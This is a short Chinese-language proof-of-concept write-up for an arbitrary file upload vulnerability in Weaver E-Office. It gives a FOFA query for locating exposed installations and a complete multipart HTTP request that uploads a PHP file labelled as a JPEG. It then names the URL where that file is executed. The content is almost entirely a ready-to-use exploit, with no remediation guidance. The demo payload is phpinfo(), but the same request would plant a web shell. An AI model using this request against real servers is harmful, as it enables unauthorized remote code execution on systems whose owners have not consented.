0x00 简介

上传任意文件
image.png

0x01 fofa

app=”泛微-EOffice”

0x02 详情

POC:

  1. POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
  2. Host: 1.1.1.1::8888
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
  4. Accept-Encoding: gzip, deflate
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  6. Connection: close
  7. Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
  8. Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
  9. Content-Length: 192
  10. Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
  11. --e64bdf16c554bbc109cecef6451c26a4
  12. Content-Disposition: form-data; name="Filedata"; filename="test.php"
  13. Content-Type: image/jpeg
  14. <?php phpinfo();?>
  15. --e64bdf16c554bbc109cecef6451c26a4--

访问

http://1.1.1.1:8888/images/logo/logo-eoffice.php

image.png